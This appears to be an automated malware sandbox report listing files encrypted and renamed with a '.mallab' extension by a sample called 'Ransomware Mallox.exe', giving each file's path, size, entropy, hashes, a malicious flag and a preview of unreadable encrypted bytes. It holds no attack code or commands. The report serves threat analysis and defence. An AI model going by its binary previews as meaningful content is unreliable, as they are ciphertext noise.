                    Preview:..R..m.I@..).$.....L-R,s..~.{.>..*`...uT.....VRUV.x.3..Sch.....l.:A...n....G..N...L)N.(+.6...&..Gt<.R...1c...X...y...1[.<...C.._P..2H.....Z..]y9.M0..b^..F.1.&c.H.>[<%.$v.R&...d.K..p.rv. ..OM.......l.^..w..u....~.+.$&{m.c......Y.T.....>W...... .D.'.rL.u..0.;.....rk...z;.V.C.........q`<A..dF.55?..I......m..^.......Wi.u.{......$.Z..y...;.7?@/O.....!......E2...S..wY.7.)..........AU..z.s..V8.....o...........0.1w..}.......;..".....zO..7.../....B./.w.@.Y.oF@!.......C..9.o.yL5.G.U.3#I..>..I.VV.yU3.....H...v[..}}/........|/{..F|...&....<J.cO.k.T..OM.../@..B.,~J/..=.]n9.m&.;..p.&I`.3......=..p..Z./^.`v....-E..s.7........LtxL.Y..4=....5...a..h....'O.L..g......-.S.K.u.........g.h......>M*..**.......hw.f.../...7-...+RVs..+..;.;...C...M.e...qN...'...!A)........FZb...@.P8..L....!A.@Z@.3....0.n....>.....)h..bl..-....GA...&..0T.<[B.'........l.I+..y1.gm|0w..1m<].Wr0.P#.em........[.9e...........I..6...........<9<..cb..\...[C]'.MKQ.z.;ez.b..S....H..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cu.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):52950
                    Entropy (8bit):7.996499504036127
                    Encrypted:true
                    SSDEEP:1536:83QGERpgGC6K8uzuNeg2pYgpr4xp7M3ryVK5:83vGCDBa2nSp4OVg
                    MD5:4BD44F181F15DC757AD213F9F6756B1A
                    SHA1:8E0424EF1A03CA4495542BC5B5C4BE287F3E2184
                    SHA-256:18C2B60E0DBAC4084767BFC09280BA80848C3A4B55E5D3A43C8513250FCED946
                    SHA-512:5B4668721CEE8B5E9FB07ADE558D9ABAAF2638D90CCEFDAF4C3AACF13FD45089D05F5714D6D95C79E4889A7C340800FD68E1848988E6FBEEAF7EECF07CE7F6F8
                    Malicious:true
                    Preview::...Q.>....~?..|.w.L=.y.....E......A.....Z..+C...m.6pK.ea ...fy._..;p.)>.@..N.L..!..0.e..K)l......^.x>..=..H.X#.$..i..|8.V.......`J^.e.........p../.q.a!....r~.."&.;...Lj........65.A..$..?*..2...].&5\.u.`.w.......[.Q....w.1.[y.m=.9J.i.gv.Z..\.K......!}W...T.M..(..j.....*.Trp..7.T..`.&.,.....G'.>.]j.0.<s.i[.*a.?..........U.......[=di ..pG.:.J........qq..,&..H..!.....(...p..F......c.>.).....7N.eM.S.}@.;.X#.q.QV......{......L_....F..6.{lb/....0d..N......../....A...l.`..]...UZl..<....E.V..++k...H.z.. ~L..(...........p...}...9."Gy.....\....L.y,Y.\j....B.......~...}.[....L....k5CZ...qj.......A..J...........p.TTR.G..D..Y.i...+l.....A..bt....T...r(.IU.~=INV....2..6..`..[S....UN.....g.t..n..D...Y....J..iI'..V._H..gZ...x.9m:Q.....{|2...'D...F......P..i.~0..2. 3....r..c...t.J....!....$.f..`...~....[.a...S-......R...`.Z|-..~X.l#.Z.5.C.....m.16.U.P.......r.@l...).8/G?...T.+......x.OO7.t.-....T..o`u..V...b.@.c....v.~..p...\.......G.....P?+.......).a

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-cy.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):36021
                    Entropy (8bit):7.995316741872214
                    Encrypted:true
                    SSDEEP:768:XJdiSduq9lA844PFBiP54A0RHwrXmESjYHpOCpgnY:XNdNjriBN0RQr2ESJCpx
                    MD5:D0412DE7BD3E959EF927A296618FE759
                    SHA1:97F94A0BF2643153D7D7C54B2F7857432C349534
                    SHA-256:A53A2F0C39ECE6508E3F2772CF828D3DA3F1776F43E86114B2C700694F88D7BC
                    SHA-512:47D8CF0CB208FF13FCEAF32F7859853EACB38C8B2DFB164295B8AC1455602419EB3BBF785173AB931BFC06100808F858135966F5A348B26BCE206F8D89FD41FF
                    Malicious:true
                    Preview:.@..,I...},}Z.FKD.`....6[.k..A.^..........J.su@&d......i.r.e..3..d..z...9].0.S.z..gN...l.l.x..o.@..9...j.{i.W{I.;...0s.Z..}.B.....+O.._d...8...e...Uo%..1D....*g.&........p......%.AtI..._..xg...t....K..3.u.0Q%DEA.Au'..l...\.$5(...+.C/..(...eI.@.u....S...`.=O;s.4[.s.w.N..N.....`..r..]...$...6.i3.g....MYm..m$.}^.JN..w'..Tr^X6.....l.=.2....C..T.beH..o......7......p...'...I.wKa][.T......O$3............U.....c..\ .....!S.Zr.i.3..R..X. ...sy..........".>.\.m.2..1~~...Q.}.B+.$....&.....k.U.S.`(<@P......=...c.Z.......>......^{{......C.w.+.#.K.Cv`.$.c.Ud.60eBQ.R..A....~Eh.......y..x........u.......U........&.n<.)9....Z..sf+.._..gza&.iy...:V......d.....@..|....w=........:..R.df-.....ugS....,..6.p.A..<r....s...6..{.f.=..|h.8.....L1.Az.....%.S.... n7h.B..lT.!U5...%`&.$..p....*oNO...v;..|q..a4ti.y{"....@;..y...fuE...hc.....\.R&..z.$>..I.4.....qy...LN..Oe.l........... ... ..N{...I.9.Jt..]..i.c8.B.}............. .,\.|w..T.|.p7.z"S...#yPE......{+Q.U...7.4X..1

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1901.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):121501
                    Entropy (8bit):7.9983821858252435
                    Encrypted:true
                    SSDEEP:3072:B20dFjMMSFFP451U4gw2q1ocI17HrY/Zl:pdFw5FP8iSCzQBl
                    MD5:8BF048ED608632C5226F4B4114C75D3A
                    SHA1:68923F27320C4C8257FB6E22C6C67042AE240BD0
                    SHA-256:0C5B417A13FB7D8890C06679AC38E6E298FB264FE479348F0E0C0908DF7D9F7A
                    SHA-512:CC014F453A1405DE8D3164D62C82BED7ABD800112346CA4F51C0841D47B022A7BAB359819F266498893C3FA6D8BBD2093CB489E89B93FA8F13C6A302A59B0CCE
                    Malicious:true
                    Preview:...0.q...7..X..b..1.$.Ay.q.....}xM.,=.....^P......&.....7..Fz....Q...`..*..XbU.AQ...._......y..LI..j.k.ph.3Vs.%...+8.mj..e.9...5..p....&.Y 41..wM.+9......^.Z.W...xfC....Rb.$...C....O...2.S..qF.X).P......4.4G.*.>[o.`F.x....Y.......OpI..T.".+....9.Twj.lj2.b.5.....Y......c../\t/;.D............V.}.......@.....h@f........&n.E...-AI...'.7V%.....M...W...._5...ok~.S.e......j.m...L..Etp..S...j.5.>z......h.|Z.s..U|82-.<v..RJ..F.^.a. >...X..DM...hx.%...a... ...&...&30.1...$4...~.E.p..T#..3.K.Z....8)..<+.o.1?.......k.f.]..5-..v....^7%...H..YF.SfR#:h...S.OFy.8..~.H..M&.......jn.M.....!.....jN.@.T.>jlO(.....`.|..W.x.S......j..j.I3..L.....z.u.d..8=h*.\......v.`k1.C.].l.uVVl`C.G,..K......._....W....A.../...T....e.q.....L.#.d.@.W_.I.}.b..+~.T....,*..&.....i=.2.3..g:.x.Sk{.T.CLi...'M.%......q.*./.c..{..6..'#....%..;.C.G.Be.rs[....>..O.N.#.........9o|.J;.............-3[q...5ZM....2..8.8..g#..{.O..D.Y..6.......:S..eqE.|.e.v.I.. .+.B..Y..tW...:..{e4.f.....2

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1996.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):120520
                    Entropy (8bit):7.998405783712546
                    Encrypted:true
                    SSDEEP:3072:Hs258DBfZFnp3+92nKgAyEu5w83LlxzjRMXc0dvNifN:M2uR7382nzrNnRxzdMdvY1
                    MD5:B6480022D8316A084065485737ACAA5A
                    SHA1:A99CA0378D6541C4CF6512FC075FA4E0ADAEDC08
                    SHA-256:1B2F8F0C4045F0F2593B0785F176343D1C2E9FCE79E591B3CAB144959EEA6820
                    SHA-512:311F0592EFB3A68364AA2ADC1D8D6E9F730DB70870B3691A422E1F9377B8B270AAA5AD49C1697E957B02C65AF352FC58BC063F8C9D7A8197E4414A2759F9A1E9
                    Malicious:true
                    Preview:......k}<.....:.QF.../..z..1.j.J.d..d..e..8.*,...v.w..&......]f.`....4...H.f.,..E.E.?..T..5.r.......SB..(......Y..U~..l.0.gQ-....~...._.K....u..]=#6...|{...T...p.....*.L.p../........Z..]...Z... .>@@X...$v8..?.&.g.K.4...........$..M..m6.._...B.i....2u...i.8d>..2&....l...a...H.;O......f.w3...c.F.R.5...W..2.I..H..E.+.:.@o.....#.=|...1.....[..w.!!...6.0u.Dm.|....,...*...]Ba......m..M3.=.5?..(...t....:...../.7....`ep^v......I."....Z....,8........R...,v...."~t.z..0^)..3....,U.4..e..A`m...._...).r..'....L.]5.l..).@Ou.K?.-.................X..&#FcUT.9..d.S.(z..lV.p...f.iqx7.|S)B.p.c.%h.......Y.e.'..t......>...w..~..8.".M.w..d+..;...I...Wy.)k.l..1l.^.F...$q......a...-X.F..T.g\......Q`..G..4...(.k%........9D......'Pg.G.~..,...h....:r|.o.:..O._...o..T:.D....<pl3..B.i..P...=.......3..Q%....c.......O.Y .fW...,...Y...0.Z5..tA$...e..).h.:....b!....G.OB.;....\Z'....\..Zp.,..!.....((...,.O6.^..%>.7..4*.N..B..S-z.~.'.i.\#....<".gC ....`.>..st.r=.;}.!.....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-ch-1901.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):120326
                    Entropy (8bit):7.998177744963771
                    Encrypted:true
                    SSDEEP:3072:bk2kUrlYWeiNuDYVIFD6SN1O9VJm4FakQjBsmfdNWgRTka18/W:bknUTJNuDkk71OVFaW+NWgt7
                    MD5:D850E88E9159B2184AD50F94BE52ECE8
                    SHA1:FE898043B428C6E0844BAAA0AE6A59B4BA3C0174
                    SHA-256:04491F4E541230E64E51BC6918566B49732845CBD9BB71BB59AD062EC4159617
                    SHA-512:5DB3D72F88CBDDC264ACE75BC05BCCDD315116465CA161B1762BFD18449334A98ADDBA6DFFADBFC38D804ED09688F1199496C68520DBD990AF8927AE1076802E
                    Malicious:true
                    Preview:J.J...jD..`.......X^...uf..Zng}2...e.s.......a..4b.....#...L..b.....K..^e.W......;..j<@Z.O+._d..r...}..H.....p.yN..]...h.Yj....).960..|1.@Z...{X_..=b.n..}..m.*$......wJ!......6.)...d7./.d.....2....h.....8.'`+Z.m@.(I....gi.....u.....E...?.'.E.5w.._-.....:0.z...~.rT.='."..s^.....t1HV....2..kl..ecF.'..#.......gK^......_l.;..;.....a4...B..=;.,..z..............z.G...V..~. ....ac.$.g#<..?.+c............ ..{.w...G+.=.!.M.'..t..;C...2..3a.....M..^..2.N.,...qBpqL.=.1)....U........^...Q.V.L..L..x.......;....H7.......6.<.....).........2I.;f..R..z...O....h.....k.5...z.....;`.V..!&KCj6.wA...s....M...]..j..=..,..{W....L.g:......@..jJ.`.!q_?.i.hG..ek.+PE....F..s..D.P.],..Jh..Y.6.y..J?.b+...oM....Y..>3.A.B......w....2.H+nJ./..R...:r..$.-.oX_z./.J.&..<....u.\C.Os...?....J.Q...........C]fSD74..B.F.0|..l..u....8.......HO.Q.vb...%U.0*...>I;.hn......`2.E..rx]..kcq.S.u...5......4Rp._.K.....V.x..d.].J......Fd..,.o........8..5L.5..B..)p.D...'E.>..-Z......

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-gb.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):46715
                    Entropy (8bit):7.995994814602748
                    Encrypted:true
                    SSDEEP:768:XrN8eMZbfVJ2Ik7h96uJOyfDRgQNf5wWfFo9b2eV4CLeriHaGSU0RYoqSZfjH:bartJBI6uoy1guwXR2eV4/MaGSU0RYoh
                    MD5:5CE3F49ABC019C63AD01A5A849A0F56D
                    SHA1:AE873F4BD12FD80E952901230C2FAA794780578A
                    SHA-256:204FFDB6FA1F0374F1A6C135BC35602153E46C9B7715959B3EC95A3F6551BB6A
                    SHA-512:93F7A1CB1A670531ED1C70916BD2528E7067987C8D15A15B15743B21FD03796958951C78AE14AAF1A8822498E5454E59288F18EA43B925C13E44AD06365E0F8E
                    Malicious:true
                    Preview:b.a+,/.ve.....HD..-/zp..".]}.4n...*..X;!@Z.~.r.3...aA7...i.!.U1..S.K.8..*.)....]....;|.w.E.R..=...>3.~.=..7x.S....\@Eo....0.uV.,....3l..p..J.UM~.j@F...-..w.|......o...\5.;.m./...D..C..C.U8....!.d....F/.j>&...M.q..RYZq.......H.......4....vh...lu..E..#P<D.,?u-....$.R.0..sD.~r2*.Q+fF....&.....Ai..C.eFr.....*..)...w.V.,m...\:`B...|3.>.=..<*..`_..c..&G..5f.!..t.?C%....1x.C.?7.D0.N.C...8p.h.d.G..I.7.4.\.Ud.,.....s_.>......2.....z.c.#.t<;.L.D......4..X.....He..c'..N...g.&..'-.i...aJ...lv........L....t.o..Rsh..u.x....h...v.M6b.xAX.$...&.?.k.@.R.b....f.....J.(..Z|..P.;.b..9u{....#.N`M.....,.yC.k.O.S...o.)....e..m.._P.<Me.y.v.....)..)..{%..J.p...o.X.#.&...HB..._.#.).b..Z....5.Mo...rYA...UM.j."k.w...IY..6..}..jQf....C..%j......A..N.*je`.tc.eb...?..J~y..B..\....Q.XT.....F..`.y.s.........t.#.W|.........+.........1....r...Ii.B\Z$.b.,.....7gJ.1.F..$.O|............pQ......{...:....{.}4q..f....CB.......0Sr.U..I."~...../.8..p.....-Y...I.Z.B$..?|Kv......l.mjk

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-us.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):59910
                    Entropy (8bit):7.9968741440060205
                    Encrypted:true
                    SSDEEP:1536:QR2j+7OJGbxy1aqHYEO1CyyX9LQa4C9uk/azr:p+KJGbxyrHYzC2Cok/u
                    MD5:16408B4C9A94882324AFA70E5206FE5E
                    SHA1:047049262112734344751DAE3DF612A545BFC8FE
                    SHA-256:F0F7C3763D26AC350108839A9A5D7A8E06CA4AD27CBDB4A0854DFFE9C45F1166
                    SHA-512:1433777DB8315FA3672ABF12FE465CE3A8A84439B59CDB92EBF474ED051054CB5525BC11BC9A0CB0E55CE0BA4515B9511AE55395A5D68195F23A00B83CD0B540
                    Malicious:true
                    Preview:.j...\X{.V(q.bI~!.\....\[....Z.@....&c....W...m.n.ZV....Y...o#.......W..._z..C.n....:..k..<.d...]Z..~h..O.t&Pq.)..G.j@..j>.LB.. .'......go.....p=..VYa}IB.;L.......I...e..).Ub.7.}#OpV-z...n`.,...-^n.9 y#..ld.,..+.Q......,.p,...:...I.A.../.[...}:}9.l.4/.sY.v.?...\..i_.T#K.X4...,xU.....A.@O....>.....o.%. [p...m.;+hb.<|.r|.<.HH....)..Lw..$...i.i.b....;..t...r...2..fB.....{JH........Ag....9..l6.5J..n.'h..0TY..4.nG...>.(..I.5.iK.0u*n........)p.....|.[.."#..J^.L"wW?.U`.cb...zZ..1v...P1.PW.SEX.......{.n..t.e....B..l*.2..1P5......J..$/.vM{....F.....o.h....J.p.3bC.w..+k.}U..;.{.BQ..6.=C.<..%.-.nt.>.k.)..T.MS..I..*..s.E.I.....&.....&.t\...P.0...g.a.^.?NT..=D.1..../....&.M...Zi.N....6...:x._W...=.........A...3.N...X.|.A@Y.........[....&H...ne..O.-e3.(R....>qB..{6..(&...|.....D.1sK....tL...J...y.,..u...v.<..)..p.X..[.Y@.[\...q7./....E[o....~Z.[.....O..0.H...S.G....1........../-o.........z!..Z.r.....qK..:;..<3.<.`=..1PKt.lwTh.tnA.[..J.C.+....Y...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-es.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):15103
                    Entropy (8bit):7.990148072117861
                    Encrypted:true
                    SSDEEP:384:s/B/xbxJbqmVTQgxBQ9fLUPLo1nwT0HAuuV6y:s/TXPhA9TUEtFHIn
                    MD5:0C027E87E7CE2AD7325A52395AA99531
                    SHA1:93BC9AF48FA6C193D67A2D312D653F0670089C75
                    SHA-256:368ADE1960AD728A99B412D210EB4B73E7733D1894338F54A078929F1D85926D
                    SHA-512:22B03479E8DD9464185BD4D05077B3385476AE0C2C2362254DFDFFD4754DCA9E4E59CF11C075FED58F94AA183E72D867AF33B305BDC4759EB4EFA3F4B952B031
                    Malicious:true
                    Preview:..k.+..gA......#"..SQ.@.p.-..D.R.o..4...h..f{...U..;..;}.g?b.j..v..bR.u.I.".4&..A.a6...8."...Kc..,.y.d.x{...(.....F...........jz......j.O..,j.....l..6+&.M...\(.5...t.mx....`.b..#.,...<........\...{.W..w.+...5hYv..*.0X.)L.2(.O. w.f.{.zj7.g._.../N1. <.......v.Z.Eu.N...a.X#........5..!.k.+..R'7P-e.....rU.P.]....1..q..0F..`..y....n...r....~..P. %..t.$..........%`..g".V..+...c.%....|..=]...r.?..pt.Z(..8.....V./p....g|B2...*.H7.#.. .@Y....%.@#B............?.2..j.^...:ZJ.,......r......W..L..,.4.e..6.U.....}O..4..d+f."..8.m...9.x+...Y..D;...A....(6....:p..1h..(.........!..J.....M....t.3...=_..;A....5..8..,O1...M4...ZQ...c..d..)...gn...U..=g.......(.j.=.c..r..KZ.1.... by5.........ffeXO.J.cI....b....7*...<.ZA.g........\"..gI3....X(.h7jF......eX..m.:m$...o...H...j./.....3^.N..A...Q.".W..k-.w..w..Y..#..1.u.....Y...0N]d=.....Z..j2...T..=.Q#.\.b..BZg.@._.(...[.q@%+...3...I$d.A....O.k.s.6..rU7..m2.b......2...&[......|F...F./f...........Y...v{....t

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-et.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):21529
                    Entropy (8bit):7.990558449658917
                    Encrypted:true
                    SSDEEP:384:ENpT1yfl3El25SmJiEjRjULwfssgP79YQWaPM1nsxA/BrVP6FsT1NN0FG3n2hszf:0p5+9Lws0hJBR4nxZrFuSfNluGf
                    MD5:E9B6F452C78E2433D898EA86C262556D
                    SHA1:3A9F22EA357B5DB9F28CD74965174530EE4EBF0A
                    SHA-256:4DFBB2552AAD12A1E8A24BE2B2A29FE41CFFEDF2FA66E319250BE4B8C0AD2D8A
                    SHA-512:8AD51E281D5E26320FD685C2F8DBBA2F31E3666A3335F3A3B8E6F067CFD8216C34F86E8F4F215E88D79401560A13386EDB5A21742F73C6D71D17563BEDE47325
                    Malicious:true
                    Preview:ig.....J.Y.(..%T.Yo......'.YR.~k!..!.?%.q. ..(.\QI..5...E._Q....^..G...X>...q.p.Ts.\.G....:IN...?.l.N...}k...p.....<...S...&.U.3+Iu.b.p.3..[.]Aq..gG.u..j...R.&d...!..L.....&...M\pjZ/..K.}.^.B;.[.H.W.7...E..`..Myc.....)..m....D.......^..nZ..C.$.....k.-.v.Hl.=.<z.w...i5o......C.G..Y.k...0t. ..Ihm4....L.Q.KF......G..C.....Pw.F..Y......K.2W......~....TcE_......p.l.p..N.i.FP.)....}wXPt.$K....x.`.G.....Itq.<...,J/[..Zx....G.XY..3.vy.`........{.&<O...L3......Y}/...ghK..J..rc?5c..%9..;r..C..k..l9..@.[r.e?..u.+..b'.,0.......(,..........o...}..S....|q....@;..Vt.....(/.f':................5...?.....v.6.....p........M.q.^..?0...M.......n.<y!;...O..S...'K1.U.,.N:0k..Z.2....SE.....KBf.5 ...&D...l......f_q].w6OX..h...VOO......i.Yu...hL...>.\:./.@Z..aIae[.F.........l;.#..~.$9..|....f...f.~.J'....`R.]..I.......e.?;`_.`.J.j...v.@..Y..m......:A..z......I. .3S..7f.,{./.y...#Y73.......l.J...@_7.....6}..0.i..]..m.(-...a.p....o.c.R.....r...7o|..-4!4|w..#U....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ga.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):35932
                    Entropy (8bit):7.994906811715129
                    Encrypted:true
                    SSDEEP:768:PMQkj1uYIjIe5FxsYMOUQHKBSOSpSCfIMj4PsGqaSZ0b:PlkJuYIjIe5F2pxSn54Pw0b
                    MD5:75FC88691A21F2B2973B604778B82423
                    SHA1:E3626D8F460FC90F1AB86A2AF812EA7CF7899639
                    SHA-256:0B7743B92F7D11C82374EF008014D7E780FCB47B25EEB79CBC5886F971CF5441
                    SHA-512:C8C6DE447BC922AA5D4085B2F631850DA58428C405DA2969CA6E447ECA571EA4C9DE7A39A5EE17E12AA573A5255C8044D87E51C12D8E03B1F99BA746F5D55157
                    Malicious:true
                    Preview:...x.DI.W..R.s.`..HJ@|........{..Eh.8..u.wn..8.P.z.f.............vP.D..e..*(.R.-...Uf.[U..:{.........&@..G..f..kc...~..Y..;Cg.*...sBC..!.......^..WI..*..,..%...Zdl..V9Q...[.9o..H.....T.u.v..$.>.`....z\?.r.S..1.[..nR...y...>.Y/z.S.=..@f..-..m....>5...:&.. ..x.Ms.Jn....I.$%.*)$.eP..0..{.E6S|HT.S..yV5G.K.3}^.&o.u.\.SME..O...H.6.~...$:......>Ng.ALx.M{.}...`O..)...q.R...._.o+......<#....nO5...........+UF....>"}o..%.EK.s.8.)6.bvRk.Z...9..n.dhkh..G..D.b.z.~......c.mL.O...Yv...e.(.n.s....C..Bb.Dmk..2{.....toB%.?..4 0....@..c.;r..+...a=.......yt\..,K..97.s...MT7Id...R......... .<.."..4........I>?...7'l..g.e........c..^.w.zg1bHl.A...^..4.K.8..r'......\OF..K.c.....&V.........Tr.h....~s..J_...k...s`...._egu2.'../TR..C.....h..c.....*.s.v.OG..+".Od...C:5...K..,E.4...GD.S.x.}..3c...{.H...k.j....#.|?.>.-<.D.....4.....g.mtW.J..V..e...:$...?.g.|....o=..#.......*.V].P..5..@.q.}...._..]...Y.0..W.GZ..k.}....`Od.I....}w.x}b......U.Z.[.....1xFf..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-hu.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):317359
                    Entropy (8bit):7.999471929492412
                    Encrypted:true
                    SSDEEP:6144:ezgUGethRG3gDTHafkuLka9sUQPej3sLHhCZ+4gs558pi71hGMcF:NeJ2gPHaMu42j3uUU4gs5qp0/w
                    MD5:238D775ABC4426C96044FBAC26C13C34
                    SHA1:7E5AE67627EB09BAB7479DFF01F3978DA1848285
                    SHA-256:919C47EBA21B714FC75A0F9281D8F313ABE2C13BBFD56F0866E301AF24FD9798
                    SHA-512:5B1E21D6AC5CD1C78CED110F193B7AE89429AC1820E4E3E445DA0C7EE72AE5E4FCF3E1616D01D090EC7B1C864809E637E23338611FBF55BBC9C9A7C3BEF5ABA4
                    Malicious:true
                    Preview:...Tq6.......I.8pj....DH|.2.............d5.`..X..%.+/g..U.W....p..W%w.p..R...sbL.j.y..+..T..K.+....Z.q.?..c...N..)...*x0C.s...!V {...E...? J.,W,..L..-.K.8.uf.....@.a..}UjR_.......@@...W.?!..)_....8..6.xG..o".p.f.. *..0o.r..l..'...cHT.9.Ea....u.5..(,...;...}]u....W....#.....Y.)...=Zk..1......O..,g.......n..j.....k,2....}.....q....,A..o".k.L.B..x..eU:..q....Q...;....M..HH..6...(w7.434.#.y.n..x..-.....\?i........Q........z..6....n.E....y..............u.g.q..ML..jQ...~.[...N...Ze..rg.9...c:.....:e|..Qd.K.s....v....Z.PS.{.U....t..A.8`...<...o...{}..!M.-. G...3....``0f...i....k.....e.5~.V..t.5zb.:Q.E....aqB.`.c...@EC:Nk.l.\..U...G..`)N.L<).Xq.R6?..[.K^a..,..(..O...V..u.z{.......)7.H..'....c0....*.-.5.`.....sn\......C..<..(H`ur>J.'.......Jn#>..(..q.E.7tn..1..$-+........Q.1~VK..>...x.[..H.K.s.e......H.g.].b..D..j...K(Z....../...........J..N.../.E...Nzx.a....N.ER...Q.\1<..c:T*^.....;.`X{..Q..5g`.;@.m.6@a6R.....7.t.Q...H...4...ky.h..c...k....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nb.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):145371
                    Entropy (8bit):7.998823731009282
                    Encrypted:true
                    SSDEEP:3072:8p6yb0lrCS6k74NaYYgUFhDlW4h1fHekLOPMYGFRxYrbu+Z:8IycC5gg0DlW4DfCPMtjYrbF
                    MD5:F44631EFE4636FC3F7EF3C0BA3496E5C
                    SHA1:F6B29C9277CA0C1071AFD9081651EF78D7B43A30
                    SHA-256:3B8AAED66BFBD58F2BD5922A49B72429C390DB06335BE461317136D2497E6993
                    SHA-512:3E6D538936246C5657A486EAF439396849D3F219E33B81D923CF078CCDAE23C774473B2F0DD6E6BBF6244AEF0B3372BAA696C58E564F3D7945D1F6BF155895BA
                    Malicious:true
                    Preview:Yr_G.+~.!}&...".d.(......}.>.+5..q.8[.%@.8.o....m...h.,...z;..}......8'.B.N~........GcP.o......V.4.....R..f.....(:(x>\.5..cO:...bu...v.9...K..Hs.L.E....O.........agC...t.9.A..#...Y.K..ei'...a=.j ......9.0.......V..L....4.........m.B.....#v....!O.P<....d..R....b....4.].wq..nn...&.....Q'.J......@.....T^...#.Y10@.../8;...`$oM`.Y0&...7.KC.a.?>.....-i.Rp...ZN.....1.m..T...8...L.U.....T.}~..n..bV..r...Ow"/.....4l....8.....h..I..B_^...B...x..8-..!tX].b.T.."...|..D.2.NP..A.O.=..stzu....W.}..?.Pg....@.....v.9R=.Q.l.i..._...7..T.Z.'W....lK...5..$W/..:X...i..b....^(.....u.....M..7Ga..9Gt.....B.<....)e.b8CHs,.".h.(.F!.}....8i...m..#M.........J.(v.P..{..6.......e.$.A.:...V..#l"$..G.*..~<R/M.|...n@.^.S.......).KE.YzF.O.O.....aW..}../h......,=.jMZf.,..%...;.!.[%...M...x<....2.h...i.o)x\...E3.C^C.....0(...x....v..z..XW..}...m.g..`<I..~..3X....a<.Z.%..>&..!...3.|.....#.t.5...ZCJ9.ao........ex...?.I....b2......wtRs.........t ..-...b..rX.=....4;B....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-nn.hyb.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):145371
                    Entropy (8bit):7.9988636681607055
                    Encrypted:true
                    SSDEEP:3072:g5U5ANNfTy+UxIWPYhLkFnQCVX7b8jHfxTMM1BY2sJ/UMO:v6AvxBwujX30B1BYUMO
                    MD5:8024D959A68D08121246BBEA22AA27C0
                    SHA1:2FC965EFAC20FE50FDD06C0220E95CBD8979D9BD
                    SHA-256:5C259AB9654087F86B951302343ADEB4311EA9F8B5E9A2CAE7ED62BE46BBD6C4
                    SHA-512:BCC634BA62639704EDA4E36A7800776DEC0E000790DD0A7E920C47F30CF21B865E2365227FAE526D2954844B26297B270AED29CC01EADEDC0A6962359D244BF0
                    Malicious:true
                    Preview:Q......}.r{.......Gq...5.^...Kh9...@.......e.R.(...`*h....oB5ow...Lq.x:.] ...;J!)V.dK...l.In.{.YS....{...ew|.B6B]B!..*.a..S..W.....[.I.3.......8.....Ky.3D~...|s......Ef........|....?R....v...S.n...{%a........`".............fi..uM;........O.......S:.-b..U3...<...:Ve.K0.*..eV.u..'.e..tc..k..K....M......nzdo...hS...EJ&.J....$X%...C.*nc...'..P...q3g..[K"...5...J..h.H...#.. .].?t.lha....}.{..n.Yi,.^w?..-..~.Lz....?..2.<.}...z....=.....*c.#%.............g.....&..\8..>1..PN.....H...Hm..G.H.[ j1T......d.)p....A..j.....hg4..>x.O.v..)rJ....7..Wu.5[..O.W....%....;..... ...u:E.0|.np...Wk.m.p..N.......q....+{..v.q..........IoH @#....9..xD.m.Q*j..F..td.[.....)^.....8.M+...a.N;....^.w...=5X...67Aa.g...........KY.h.T{.Q...o.a.b.,..4.h.Q.O......JN......KWd...~T..s..d._..[a.>..}..y..i..{Y_i,.A....#..13@(HOF;jex....c.`.s..T..<kT,Y.........b.........x#.X...q.s.....(..Y.y...+N(..uJ.z......N<.a...3]..(..k.K.j.L...G.0.<...u.....@......;...a.`...V..f5......R...{.j:

                    C:\Documents and Settings\user\Local Settings\Microsoft\FontCache\4\Catalog\ListAll.Json.mallab (copy)

                    Download File
